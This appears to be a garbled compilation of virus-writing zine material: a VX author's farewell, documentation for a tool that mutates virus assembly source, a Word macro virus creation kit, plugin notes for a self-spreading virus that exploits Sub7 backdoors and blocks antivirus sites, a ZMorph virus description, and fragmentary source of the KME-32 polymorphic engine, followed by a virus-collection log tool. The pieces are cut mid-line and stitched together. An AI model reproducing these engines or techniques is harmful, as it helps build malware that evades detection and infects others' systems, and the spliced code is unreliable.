reaciate and which is phuckin'rad.XD. I'm talking about guys like, Knowdeth,
LysKovick, Anti State Tortoise, VicodinES, Spo0ky, Foxz and some others who
walked together with me through the dark woods of new inovative macro tech-
nics. Thank you guys, you really did kewl werk!
I dunno yet if there will be any new stuff coming from my side, because I
feel kinda lazy these days. A lot of shit happenend and is happening and I'm
kinda forced to leave things away. Only thing left to say which fits lately
is 'mens sana in corpore sano', but I dunno if it fits for me. If I should
burst into the flames, I just want you to know that I love you all. xD
The last column of this paper is dedicated as an appeal to all the new guys
that come outta ground from day to day. If you wanna learn, you're welcome,
otherwise, get the phuck outta our world. So, in this sense, don't let the
world bring you don't young coder and remember, whatever tomorrow brings, I
could be there...XD. Sleep tight and listen to Black Sabbath!
.Greets'n'Thanks
Phewie, this time I'm gonna shorten my list of shout out's a bit. Well, I
hope I do not forget any of the kewl souls out there...
.Linezer0 Network .Hi there tribe, CD, NtS, Hermes and all others!
.Metaphase .Phuckin' great team.
.Contact
If any of you feel like contacting me, you can use the following sources to
contact me. No spam please.
WorldWideWeb: http://www.coderz.net/jackie/
EMail: jackie@coderz.net
IRC: Undernet #virus
ICQ: 36135930
.Kewl Music
You can also access the directories table and the sections
and look them up. Those sections and directories which are known
(like imports, exports, relocations, resources) are displayed at
the full extend, allowing you to see everything.
Good luck!
A word of warning
~~~~~~~~~~~~~~~~~
This tool is not intended for use by novice users, since you will
need in-depth assembler knowlegde to know what kind of operands
cause which flags to trigger, or what operands you can change
without creating a possibility that one of the generated source
codes will not compile properly, or even worse, produce a virus that
is defective! RRRACC also ain't fool proof yet, and it could benefit
from a lot of improvements, so if you don't use it with care,
disasters could happen. In other words,
General
~~~~~~~
Rajaats Recursive Random Assembler Code Creator, RRRACC for short
(and if you still don't like it you can pronounce it as ROCK), is a
utility that processes text files, recognizes special tokens which
it uses to randomize the input, and write the result to an output
file. This does not have to mean assembler code, but my primary
intention was to make it work mainly with assemblers.
Invocation
~~~~~~~~~~
To invoke RRRACC on a file, use the following syntax:
RRRACC infile.ext outfile.ext
----------
Rajaats Recursive Random Assembler Code Creator (RRRACC) Version 1.03
Internal Version Id RRRACC1.03
Statistics:
1 mutation out of 8.88520724322027e+62 possible complete mutations
1 mutation out of 589824 possible line mutations
1 mutation out of 1.50641670112106e+57 possible variable mutations
1 mutation out of 1 possible variable ranges
Please be nice and do not remove the header of the generated file, it is
for educational purpose only. :-)
Comments to rajaat@itookmyprozac.com
----------
Please not that RRRACC doesn't has strong error checking, so you
better get familiar with the inner workings of the tokens, which I
will explain to you in the next section. You also might get shocked
at the large numbers in the statistics. These are mathematically
correct, assuming the instructions are very different in nature, a 1
out of 1 mutation means that there weren't any mutations performed
of this type.
ASM to RRRACC
~~~~~~~~~~~~~
The most common use of RRRACC is probably converting an existing
virus source to a RRRACC parseable one, which is easiest to do in
the beginning. If you grow more accustomed to the use of RRRACC you
might want to write directly code that can be parsed by it.
This might not seem a lot, and indeed I think it is yet a start, but
if properly applied, this can create tons of variants from one
single RRRACC source.
! mov ax,4202h
! xor cx,cx
! xor dx,dx ; DON'T USE CWD!
int 21h
would mean that the first three lines can be changed in random
order. I also hereby present you the first caveat you could get
yourself entangled in. If you are an optimizing fanatic and
change the xor dx,dx to a cwd ,it might have a chance of
generating a sequence like this
cwd
mov ax,4202h
xor cx,cx
where you don't know what value ax had before it was converted
to a doubleword. You are in luck if ax already happens to be
less than 8000h. If you don't understand this, go buy a book
about assembler or surf the internet to get one.
Well as you see, it's not hard to use RRRACC, it's more a
problem of knowing assembler right. Another example
! pop ds
! cmp ax,4b00
jz infect
would be perfectly right, since the pop ds opcode does not
affect the flags, so the cmp ax,4b00 is allowed to be swapped
before it. But look out for this
! pop ds
! mov word ptr ds:[old_21],bx
since the second line depends on ds set properly, you can't swap
these.
Combining
~~~~~~~~~
The true power of RRRACC (yuck) comes in view when you combine
both the line randomizer and the random variable substitution.
I'll show you a little example again:
~rndzero1 = ( "xor" "sub" )
~rndzero2 = ( "xor" "sub" )
! mov ax,4202h ; seek eof
! ~rndzero1 cx,cx
! ~rndzero2 dx,dx
Future
~~~~~~
RRRACC is very powerful in its simplicity, still it lacks a lot of
thing I would like to add before I start on my GRACE project, like
Contact
~~~~~~~
If you have any questions or bug reports (this does not include
invalid use, read the docs), feel free to mail them to
rajaat@itookmyprozac.com and I'll try to answer them. You can also
check my website for new updates or new programs, which is located
at
http://www.sourceofkaos.com/homes/rajaat
Hint
~~~~
You might want to print out this help, which can simply do by
redirecting the output, like : RRRACC --help > lpt1.
The WalruS Macro Virus Generator (WMVG)
The WalruS Macro Virus Generator Is A Easy To Use Virus Creation Kit For Word 97/2K. WMVG Is
AutoRun When The Document WMVG.doc Is Opened In Word.
In Addition There Are Text Boxes For Virus Author, Virus Name And Virus Comments (Not
critical).
Every Option Has An Associated Help Button Providing A Help Message Box
In Addition To Making Viruses WMVG Also Has An Extras Screen. Here There Are The Following
Options.
Scattered Throughout The WMVG Are Secret And Hidden Bits Of Information (Just For Fun)
In Future WMVG Will Be Updated To Include More And Different User Options.
WMVG Was Designed, Written And Tested On Word 2K. If You Spot A Bug Of Any Kind Please
Inform Below. Please
WMVG Fonts Are Comic Sans MS Which Is Part Of Office Installation. Should The WMVG Text
Look Incorrect Then Ensure That The Font Is Present In The C:\Windows\Fonts Folder. If It Is
Not Then The Font Is Provided With WMVG In The Folder Labelled Font
WalruS@Z.com
http://www.WalruS.8k.com
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[HOWWORKS.TXT]ÄÄÄ
HOW WRITE YOUR OWN MUAZZIN
Muazzins receive control at first byte, and can respond to the following
request, passed in the appropriated structure:
MT_PROCESSDROPPER - called with the buffer and the current size as parameter,
is the place to insert poly over the dropper, change the
icon, and all other things that affect the form of the
pe exe dropper, that is the traveling form of the virus.
MT_BLOCKIP - called with the IP that the user pretend connect and the
port, it have several uses. Can block the IP of AV sites
in the internet, can save the smtp and nntp server that
the user uses, can scan for open machines in these
network, etc...
MT_BREED - called each full moon, is the time for the muazzin send
all muazzins installed in current system to places where
others muazzins, by using MT_BLOOM, can retrieve they.
Post to usenet, sending emails, etc should be done here.
Notice that a single muazzin can respond to more than one type of call. Is a
good idea make they work together: a muazzin that generate texts about pokemon
in MT_GENTEXT can also change the icon, in MT_PROCESSDROPPER. A muazzin that
scan for back orifice backdoor at each MT_BLOCKIP and upload itself to there,
should also process MT_APP, coz the dropper, that it will need to upload to
backdoor, isnt passed in calls to MT_BLOCKIP. Etc...
Also notice that these rules arent written in stone: nothing forbid you to,
in a dynamic system as IRC, use MT_BLOOM to receive and also send muazzins,
or like.
Once you have written your own muazzin, you should encrypt and sign it with
the included utility, and should test it lots. They key included in this
release isnt the key that the virus carry, so, dont wait for it work with "in
the wild" samples. If you think that others infected machines need your
muazzin, contact me for a signature.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[HOWWORKS.TXT]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[MUAZZINS.TXT]ÄÄÄ
SAMPLE MUAZZIN INCLUDED:
/EXE - Infect DOS EXE files. Infected files check Win32 OS and
write and run dropper if positive. Recursive search.
/HLP - Search and infect HLP files with Babyloniaïs hlp infection
scheme. Recursive search.
/RARZIP - Search for ZIP and RAR files, using Z0MBiE library, and
add droppers to they. Recursive search.
/SUB7 - Scan contacted subnet type C for sub7 backdoor, and then
upload/run/delete virus dropper to such system. Bypass
sub7 server password. To do the manual work ;)
SERVER.S - Save the users default SMTP and NNTP servers to registry,
and return they at virus request.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[MUAZZINS.TXT]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[GREETS.TXT]ÄÄÄ
If I can see fo far, is becoz I am in the shoulders of giants...
This virus will not exists if was not by the extreme help and support of
several peoples, that helped in all phases of the develpment. Greetz go to
Spanska and Mister Sandman, the intellectual co-authors of this virus, to
Z0MBiE, the master coder, for all kind of magic routines. Finally, the
brazilian crew, my team, with Kamaileon, NBK, Alevirus and Nimbus, that,
beside the testings and the help in several muazzins, give me support and
made this creation know worldwide. ;-)
Greets also go for VirusBuster and Gigabyte, that always give me the
emotional support in my dark days, and urgo32, that tried to teach me math.
Vecna, 2000
ps: to contact me, contact somebody named here, and they will make your name
and email reach me.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[GREETS.TXT]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[FILE_ID.DIZ]ÄÄÄ
KME-32 v3.00 - Kewl Mutation Engine
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- easy to use
- compatible with any 32-bit platform (Win9X/WinNT, ring0/ring3)
- stack algorithm, allowing data compression
- highly configurable
- commented sources included
- full russian/english documentation
- examples
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[FILE_ID.DIZ]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[ZMORPH.TXT]ÄÄÄ
Win95.ZMorph
------------------------------------------------------------------------
These are Win9x viruses infecting PE EXE files (Windows executable files).
The viruses have a significant feature - a polymorphic engine that is used
by viruses to hide their code in infected files. This polymorphic engine
modifies the virus code so that there is not a single piece of virus code
continuously stored in an infected file, in any encrypted and "clear" form.
Instead of the "standard" method of appending the virus code to the file as
a continuous sequence of [encrypted] code instructions, data areas, e.t.c.,
the virus addition to infected files looks like a chain of routines of
random size, randomly stored at the end of the file; each routine passes
control to the next one, and all these routines are polymorphic:
+-------------+
|Infected file|
+-------------+ <--------+
|+-----+ | | |
| | | |
| | | |
| +-------+ | | |
. . . | | |
. . . | | |
+----+ | | |
| +----+ | <----+ | |
|+---+ | |
| +----+| |
Because of such a method to store the virus code while infecting, the files
length grows by large values - up to 30Kb. The size of the virus addition to
the file may be approximated as "real virus" size multiplied by six (in case
of 5200 bytes virus the victim files size grows by about 32K).
ZMorph.2784
This is a memory resident Win9x virus. It switches its code to system driver
mode (Ring0), allocates a block of driver's memory, copies itself to there
and hooks two events: port 8888h reading (is used for "Are-you-here" call to
detect already installed TSR virus copy), and IFS API (files access
functions). The virus then returns control to the host file. The virus TSR
copy is then active as VxD system driver, intercepts file access functions
and infects PE EXE files that are accessed.
The virus does not manifest itself in any way. It contains the text:
KME.Z0MBiE-4.b
ZMorph.5200
This version of the virus can be found in two variants: as infected PE EXE
file, and as a virus "installer" - RUNDLL16.EXE file in the Windows system
directory.
The virus does not perform any harm action except scanning Windows memory
for AVP Monitor and some other Windows resident anti-virus protection, and
disabling it by patching Monitor's code.
z0mbie.cjb.net
When an infected file is executed, the virus' polymorphic code gets control,
restores the original virus code to the stack and jumps to there - to the
virus installation routine. The virus installation gets the needed Windows
functions addresses by scanning the KERNEL32.DLL image in Windows memory
(this is usual for most of Win32 viruses) and performs two actions: installs
virus code into the Windows system directory, and leaves virus resident copy
in Windows memory.
Ring0 component
To install itself memory resident the virus switches its code to system
driver mode (Ring0), allocates a block of driver's memory, copies itself to
there and hooks two events: port 8889h reading (is used for "Are-you-here"
calls to detect already installed TSR virus copy), and IFS API (files access
functions). The virus then returns control to the host file, and virus TSR
copy is then active as VxD system driver, intercepts file access functions
and infects PE EXE files that are accessed.
RUNDLL16 component
While installing its copy in Windows system directory the virus creates the
RUNDLL16.EXE file in there, writes to this file its image in PE EXE file
form, and spawns it. The RUNDLL16.EXE registers itself in the system as
Service Process (invisible task), and registers its file (RUNDLL16.EXE) as
auto-run file. To do that the virus creates the registry key:
The virus process then sleeps for several minutes, then scans subdirectory
trees on all fixed drives from C: till Z:, "touches" EXE files there, and as
a result forces Ring0 component to infect them.
Infection
While infecting a file the virus parses its internal PE format, increases
size of the last section, runs its polymorphic engine and writes the result
of it to the end of the file. The virus then modifies the necessary PE
header fields, including program startup address.
kme_start:
; local variables
local save_esp:DWORD
pusha
mov in_subroutine, cl
mov p_count, ecx
mov fpuinit, cl
mov fpustack, cl
cmp initregptr, 0
je @@ir_done
xor ebx, ebx
@@ir_cycle: bt regavail, ebx
jnc @@ir_cont
mov edx, initregptr
mov edx, [edx+ebx*4]
cmp edx, -1
je @@ir_cont
mov em_reg[ebx*4], edx
bts reginit, ebx
@@ir_cont: inc ebx
cmp bl, 8
jb @@ir_cycle
@@ir_done:
; error handler
@@error3: ; int 3
@@error2: ; int 3
@@error1: ; int 3
@@error: mov esp, save_esp ; rest. ESP (if call from sub)
stc ; CF=1 - an error occured
jmp @@error_exit
; ---------------------------------------------------------------------------
; push 1 register
; (indexes stored in regbuf, count in ECX)
; ===========================================================================
; "epilog" code --
; -- load regs and JMP ESP in perverted form
cmp regused, 0
jne @@error1
mov eax, 20
call @@multi_garbage
jmp @@1ornot
call @@rnd_zf
jz @@skip_xchg
bts regavail, ecx ; free reg1
btr regavail, ebx
btr reginit, ebx
xchg ecx, ebx ; invert register usage
@@skip_xchg:
call @@rnd_zf
jz @@jmp
mov eax, 20
call @@multi_garbage
call @@epilog_regs
call @@eip
mov al, 0c3h ;ret
stosb
jmp @@lwo
retn ; @@epilog
call @@poly_cmd
call @@poly_cmd
@@er_ret: retn
; ===========================================================================
@@gen_value:
; use XOR if noone specified
testcmd CMD_XOR+CMD_ADD+CMD_SUB+CMD_AND+CMD_OR, @@rdef
jz @@r0 ; dispatch
dec eax
jz @@r1
@@rt: retn
or em_reg[ebx*4], edx
; ---------------------------------------------------------------------------
; ---------------------------------------------------------------------------
; ---------------------------------------------------------------------------
push ebx
mov ebx, eax
call @@rnd_zf
jz @@init_pushpop
@@reg_init_retn: retn
call @@eip
lea eax, [ebx+58h]
stosb
jmp @@init_done
; ---------------------------------------------------------------------------
; ===========================================================================
retn
; ---------------------------------------------------------------------------
@@eip_do1: pushad
jmp @@eip_do
@@eip: pusha
@@eip_do:
; well, here we MUST select new location, or die
@@poly_cmd: pusha
IFNDEF LITE
mov eax, cmdavail ; no avail cmds?
or eax, cmdavail2
jz @@poly_cmd_exit ; --exit
ENDIF
@@poly_cmd_restart:
mov eax, 55
call @@rnd_eax ; select random command index
; dispatch
or eax, eax
jz @@x_not
dec eax
jz @@x_neg
dec eax
jz @@x_inc
dec eax
jz @@x_dec
dec eax
jz @@x_inc
dec eax
jz @@x_dec
dec eax
jz @@x_shl
dec eax
jz @@x_shr
dec eax
jz @@x_rol
dec eax
jz @@x_ror
dec eax
jz @@x_sar
dec eax
jz @@x_mov_c
dec eax
jz @@x_add_c
dec eax
jz @@x_sub_c
dec eax
jz @@x_mov_c
dec eax
jz @@x_add_c
dec eax
jz @@x_sub_c
dec eax
jz @@x_xor_c
dec eax
jz @@x_and_c
dec eax
jz @@x_or_c
dec eax
jz @@x_rol_c
dec eax
jz @@x_ror_c
dec eax ; r1
jz @@x_bswap
dec eax
jz @@x_mul
dec eax
jz @@x_imul
dec eax
jz @@x_div
dec eax
jz @@x_idiv
dec eax
jz @@x_fpu
dec eax
jz @@cmp_i_follow
dec eax
jz @@cmp_i_nofollow
dec eax
jz @@callsub
dec eax
jz @@subroutine
dec eax
jz @@x_bsr
dec eax
jz @@x_bsf
dec eax
jz @@x_xchg
dec eax
jz @@x_mov
dec eax
jz @@x_and
dec eax
jz @@x_or
dec eax
jz @@cmp_r_nofollow
dec eax
jz @@cmp_r_follow
dec eax
jz @@x_cycle
@@poly_cmd_exit: ; exit
mov [esp+0*4], edi ; pushad_edi
popa
retn
call @@eip
call @@rnd_zf
jz @@gen_sub
jmp @@gen_done
call @@eip
mov ax, 0F881h ; cmp r,result
or ah, REG1_8
stosw
mov eax, em_reg[REG1*4]
stosd
cmp eax, eax
call @@eip
mov ax, 850Fh ; jne
stosw
stosd
pop eax ; start-cycle: eip
sub eax, edi
mov [edi-4], eax
jmp @@poly_cmd_exit
; push params
jecxz @@skip_push_rnd
mov eax, 8
call @@rnd_eax
add al, 50h
stosb
loop @@push_rnd
@@skip_push_rnd:
; generate call
call @@eip
; now, push all the state related to output code flow generation
jmp @@s_done
call @@state_push
shl ecx, 2
push ecx ; params size, in BYTEs
; prolog
mov ebx, regavail
@@push_loop: call @@eip
bsf eax, ebx ; smart idea
jz @@push_done
btr ebx, eax
add al, 50h
stosb
jmp @@push_loop
@@push_done:
; body
mov eax, 50
call @@multi_garbage
call @@eip
; epilog
mov ebx, regavail ; pop mask
@@pop_loop: call @@eip
bsr eax, ebx
jz @@pop_done
btr ebx, eax
add al, 58h ;POP regs 1 at once
stosb
jmp @@pop_loop
@@pop_done:
; retn
call @@eip
call @@state_pop
jmp @@e_done
push regavail
jmp esi
pop regavail
jmp esi
cmp REG2, 4
jae @@poly_cmd_exit
call @@rnd_zf
jz @@use_xl
jmp @@stos_sxzx
@@stos_sxzx:
mov em_reg[REG1*4], ecx
stosw
jmp @@poly_cmd_exit
jmp @@pop
call @@rnd_zf
jz @@imm_d
jmp @@pop
call @@eip
lea eax, [REG1+58h]
stosb ;pop reg
jmp @@poly_cmd_exit
mov tempo, -1
jmp @@cmp_i
mov tempo, 0
@@cmp_i:
test REG1, REG1
jnz @@longcmp
flagsnz FLAG_NOSHORT, @@longcmp ; if skip short opcs
dec edi ;
cmp byte ptr [edi], 3Dh ; EAX ?
je @@longcmp ;
inc edi ;
jmp @@outcond
@@useit: stosd
jmp @@outcond
mov tempo, -1
jmp @@cmp_r
mov tempo, 0
@@cmp_r:
push REG1 REG2 ; 'coz of @@swap
@@outcond:
call @@eip
seto jxxcond[0]
setb jxxcond[2]
sete jxxcond[4]
setbe jxxcond[6]
sets jxxcond[8]
setp jxxcond[10]
setl jxxcond[12]
setle jxxcond[14]
mov eax, 8
call @@rnd_eax
shl eax, 1
xor al, jxxcond[eax]
xor al, 70h
jmp @@poly_cmd_exit
@@short_dontfollow: stosb
call @@random_byte
stosb ;displacement(that dont get exec)
jmp @@poly_cmd_exit
jmp @@poly_cmd_exit
@@modrm: pusha
mov al, 0C0h
shl REG2_8, 3
or al, REG2_8
or al, REG1_8
stosb
popa
inc edi
retn
@@stosw_modrm_stosbX: stosw
call @@modrm
jmp @@stosbX
@@stosb_modrm_stosd: stosb
call @@modrm
jmp @@stosd
@@stos3or: stosw
shr eax, 16
or al, REG1_8
mov ah, XXX_8
stosw
jmp @@poly_cmd_exit
; ---------------------------------------------------------------------------
@@x_not: testcmd CMD_NOT, @@poly_cmd_restart
not em_reg[REG1*4] ; emul -- not r1
mov ax, 0d0f7h ; opcode
jmp @@orahR1_stosw
@@can_idiv: pusha
or ecx, ecx
jz @@idiv_err
jg @@g1
neg ecx
@@g1: or edx, edx
jge @@g2
neg edx
neg eax
sbb edx, 0
@@g2: xor esi, esi ; d
xor edi, edi ; m
mov bl, 64
@@divcycle: shl esi, 1 ; d <<= 1
jc @@idiv_err
shl eax, 1 ; x <<= 1
rcl edx, 1
rcl edi, 1 ; m = (m << 1) | x.bit[i]
jc @@cmpsub
cmp edi, ecx ; if (m >= y)
jb @@cmpsubok
@@cmpsub: sbb edi, ecx ; m -= y
or esi, 1 ; d |= 1
@@cmpsubok: dec bl
jnz @@divcycle
shl esi, 1
jc @@idiv_err
shl edi, 1
jc @@idiv_err
popa
retn
@@idiv_err: stc
popa
retn
; ---------------------------------------------------------------------------
; real super-puper...
cmp fpuinit, 0
jne @@alredyinit
inc fpuinit
call @@poly_cmd
call @@eip
@@alredyinit:
lea eax, [REG2+50h] ; push reg2
stosb
push em_reg[REG2*4]
call @@poly_cmd
call @@eip
mov ax, 04DBh ; fild dword ptr [esp]
stosw
mov al, 24h
stosb
fild dword ptr [esp]
inc fpustack
call @@poly_cmd
call @@rnd_zf
jz @@cos
call @@eip
mov ax, 1CD9h ; fstp dword ptr [esp]
stosw
mov al, 24h
stosb
fstp dword ptr [esp]
dec fpustack
call @@poly_cmd
pop em_reg[REG1*4]
call @@eip
lea eax, [REG1+58h] ; pop reg1
stosb
jmp @@poly_cmd_exit
; ---------------------------------------------------------------------------
kme_main endp
kme_end:
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[KME32.INC]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[KME32.INT]ÄÄÄ
; ===========================================================================
; KME-32 v3.00 Kewl Mutation Engine (c) 99-00 Z0MBiE, Vecna
; ===========================================================================
CMD2_ALL equ -1
uses
dos, crt, lgarray;
var
f : text;
newfile : text;
flag1 : boolean;
flag2 : boolean;
count : longint;
log_file : string;
tipo : string;
dic1 : dictionary;
dic2 : dictionary;
dic3 : dictionary;
dic4 : dictionary;
dic5 : dictionary;
dic6 : dictionary;
dic7 : dictionary;
dic8 : dictionary;
dic9 : dictionary;
dic10 : dictionary;
dic11 : dictionary;
dic12 : dictionary;
dic13 : dictionary;
i : integer;
log : text;
instring : string;
filename : string;
virusname : string;
test : longint;
parm1 : string;
parm2 : string;
parm3 : string;
last_bar : byte;
tmp_str : string;
TBuff : Pointer;
TBuffsize : LongInt;
temp_string : string;
space_position : byte;
procedure ShowHelp;
begin
writeln(' -b {s} <logname> Build new DAT file');
writeln(' -c {s} <logname> Compare someone elses log');
writeln(' -a {l} {s} <logname> Add new virii');
writeln(' -h {u} Count virii');
writeln;
halt;
end;
procedure call_buffer;
begin
tbuffsize:=Maxavail;
if tbuffsize > $fff0 then tbuffsize := $fff0;
getmem(tbuff,tbuffsize);
end;
procedure inicializa_diccionarios;
begin
dicAssign(dic1,'dict1');
dicRewrite(dic1,4000);
dicAssign(dic2,'dict2');
dicRewrite(dic2,4000);
dicAssign(dic3,'dict3');
dicRewrite(dic3,4000);
dicAssign(dic4,'dict4');
dicRewrite(dic4,4000);
dicAssign(dic5,'dict5');
dicRewrite(dic5,5000);
dicAssign(dic6,'dict6');
dicRewrite(dic6,5000);
dicAssign(dic7,'dict7');
dicRewrite(dic7,4000);
dicAssign(dic8,'dict8');
dicRewrite(dic8,4000);
dicAssign(dic9,'dict9');
dicRewrite(dic9,4000);
dicAssign(dic10,'dict10');
dicRewrite(dic10,4000);
dicAssign(dic11,'dict11');
dicRewrite(dic11,4000);
dicAssign(dic12,'dict12');
dicRewrite(dic12,4000);
dicAssign(dic13,'dict13');
dicRewrite(dic13,4000);
end;
procedure escribe_diccionario;
begin
if UpCase(virusname[1]) >= 'T' then
begin
if UpCase(virusname[1]) <= 'U' then dicWrite(dic8,
virusname,test)
else if UpCase(virusname[1]) = 'V' then dicWrite(dic9,
virusname,test)
else if UpCase(virusname[1]) = 'W' then dicWrite(dic6,
virusname,test)
else if UpCase(virusname[1]) <= 'Z' then dicWrite(dic10,
virusname,test)
else dicWrite(dic1,virusname,test);
end
else if UpCase(virusname[1]) >= 'M' then
begin
if UpCase(virusname[1]) = 'M' then dicWrite(dic13,
virusname,test)
else if UpCase(virusname[1]) <= 'O' then dicWrite(
dic4,virusname,test)
else if UpCase(virusname[1]) <= 'Q' then dicWrite(
dic5,virusname,test)
else if UpCase(virusname[1]) <= 'S' then dicWrite(
dic7,virusname,test);
end
else
begin
if UpCase(virusname[1]) <= 'B' then dicWrite(dic1,virusname,test)
else if UpCase(virusname[1]) <= 'F' then dicWrite(dic2,virusname,test)
else if UpCase(virusname[1]) <= 'H' then dicWrite(dic3,virusname,test)
else if UpCase(virusname[1]) <= 'J' then dicWrite(dic11,virusname,test)
else if UpCase(virusname[1]) <= 'L' then dicWrite(dic12,virusname,test);
end;
end;
procedure cierra_diccionarios;
begin
dicClose;
dicErase(dic1);
dicErase(dic2);
dicErase(dic3);
dicErase(dic4);
dicErase(dic5);
dicErase(dic6);
dicErase(dic7);
dicErase(dic8);
dicErase(dic9);
dicErase(dic10);
dicErase(dic11);
dicErase(dic12);
dicErase(dic13);
end;
procedure no_virii;
begin
writeln('No virii found to process!');
end;
procedure no_new_virii_found;
begin
writeln('No new virii found');
end;
procedure no_new_virii_added;
begin
writeln('No new virii added');
end;
procedure not_find_avp;
begin
writeln('Can not find AVP.DAT in current directory!');
end;
procedure not_find_fprot;
begin
writeln('Can not find FPROT.DAT in current directory!');
end;
procedure no_dat;
begin
writeln('No DAT files found!');
end;
begin
assign(f,log_file);
reset(f);
size := filesize(f);
close(f);
if size = 0 then erase(f);
end;
procedure DetectLog;
begin
flag1:=false;
tipo:='';
while flag1=false do
begin
readln(log,instring);
if (pos('infected:',instring)) or (pos('warning:',instring)) > 0 then
begin
tipo:='AVP';
flag1:=true;
end
else if pos(' Infection: ',instring) > 0 then
begin
tipo:='F-PROT';
flag1:=true;
end;
if eof(log) then flag1:=true;
end;
end;
procedure BuildNewDat_A(logname:string);
begin
writeln('Detected AVP log file');
writeln('Building AVP.DAT from ',logname);
reset(log);
assign(f,'AVP.DAT');
call_buffer;
settextbuf(f,tbuff^,tbuffsize);
rewrite(f);
inicializa_diccionarios;
count := 0;
repeat
readln(log,instring);
flag1 := false;
filename := instring;
virusname := instring;
if pos('infected:',filename) > 0 then
begin
for last_bar:=length(filename) downto 0 do if filename[last_bar]=':'
then break;
delete(filename,last_bar-9,length(filename));
delete(virusname,1,last_bar+1);
flag1 := true;
end
else if pos('warning:',filename) > 0 then
begin
for last_bar:=length(filename) downto 0 do if filename[last_bar]=':'
then break;
delete(filename,last_bar-8,length(filename));
delete(virusname,1,last_bar+1);
virusname := virusname+'.warning';
flag1 := true;
end;
if flag1 = true then
begin
if pos(' ',virusname) >0 then
begin
tmp_str:=copy(virusname,1,pos(' ',virusname
)-1);
delete(virusname,1,pos(' ',virusname));
virusname:=concat(tmp_str+'_'+virusname);
end;
escribe_diccionario;
if test < 0 then
begin
inc(count);
writeln(f,filename,#1,virusname);
end;
end;
until eof(log);
writeln(count,' virii found for AVP...');
Cierra_diccionarios;
close(f);
close(log);
writeln;
end;
procedure BuildNewDAT_F(logname:string);
begin
writeln('Detected F-Prot log file');
writeln('Building FPROT.DAT from ',logname);
reset(log);
assign(f,'FPROT.DAT');
call_buffer;
settextbuf(f,tbuff^,tbuffsize);
rewrite(f);
inicializa_diccionarios;
count := 0;
repeat
readln(log,instring);
space_position:=pos('ection: ',instring);
if space_position > 0 then
begin
filename := instring;
virusname := instring;
delete(filename,space_position-5,length(filename));
delete(virusname,1,space_position+7);
if pos('New or',virusname) > 0 then
begin
delete(virusname,1,pos('of ',
virusname)+2);
virusname:=concat(virusname+
'.variant');
end;
if (parm1 = '-BS') then
else if pos(' ',virusname) > 0 then delete(virusname,pos(' ',virusname),
length(virusname));
escribe_diccionario;
if test < 0 then
begin
inc(count);
writeln(f,filename,#1,virusname);
end;
end;
until eof(log);
writeln(count,' virii found for F-Prot...');
Cierra_diccionarios;
close(f);
close(log);
writeln;
end;
procedure CompareDAT_A(logname:string);
begin
writeln('Comparing virii from ',logname);
writeln('Detected AVP log file');
reset(log);
inicializa_diccionarios;
assign(f,'avp.dat');
call_buffer;
settextbuf(f,tbuff^,tbuffsize);
{$I-}
reset(f);
{$I+}
if IOResult <> 0 then not_find_avp
else
begin
repeat
readln(f,virusname);
delete(virusname,1,pos(#1,virusname));
escribe_diccionario;
until eof(f);
close(f);
tmp_str:=('NEWAVP.LOG');
assign(newfile,'NEWAVP.LOG');
call_buffer;
settextbuf(newfile,tbuff^,tbuffsize);
{$I-}
reset(newfile);
{$I+}
count:=1;
while IOResult = 0 do
begin
close(newfile);
str(count,tmp_str);
for i:=1 to 1-length(tmp_str) do tmp_str:=tmp_str;
tmp_str:=concat('NEWAVP.LO'+tmp_str);
inc(count);
assign(newfile,tmp_str);
call_buffer;
settextbuf(newfile,tbuff^,tbuffsize);
{$I-}
reset(newfile);
{$I+}
end;
rewrite(newfile);
count := 0;
log_file:=tmp_str;
repeat
readln(log,instring);
flag1 := false;
virusname := instring;
if pos('infected:',virusname) >0 then
begin
for last_bar:=length(virusname) downto 0 do if virusname[last_bar]=':'
